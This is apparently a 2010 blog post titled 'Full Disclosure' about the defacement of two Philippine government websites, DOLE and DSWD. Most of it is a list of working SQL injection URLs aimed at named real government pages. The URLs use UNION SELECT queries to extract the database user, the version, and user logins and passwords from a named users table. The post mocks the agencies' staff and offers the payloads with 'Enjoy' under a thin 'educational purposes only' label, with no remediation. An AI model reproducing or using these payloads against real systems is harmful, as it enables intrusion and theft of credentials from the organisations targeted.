Sunday, January 10, 2010

Full Disclosure : Defaced Philippine Government Websites

Now that the DOLE and DSWD websites have been "fixed" by its highly "competent" employees days after the defacing incidents happened, it is only proper that the rest of us techies find out the details of what really happened. So without further delay, here are the actual codes probably used to obtain admin rights (note: for educational purposes only) which have been floating around the net for several months already. Enjoy .

http://www.dole.gov.ph/secondpage.php?id=-1+union+select+1,2,user%28%29,4,database%28%29,version%28%29,7,8,9--

http://www.dswd.gov.ph/faqdetails.php?id=-47%20union%20select%201,2,convert(user_login+using+utf8),4,5,6+from+benz_rb.users

http://www.dswd.gov.ph/faqdetails.php?id=-47%20union%20select%201,2,convert(user_password+using+utf8),4,5,6+from+benz_rb.users

http://www.dswd.gov.ph/articledetails.php?id=-1144+union+select+1,2,3,4,version(),6--

No comments:

Post a Comment

Certified Ethical Hacker Network Security Internet Security Computer Security Wireless Network Security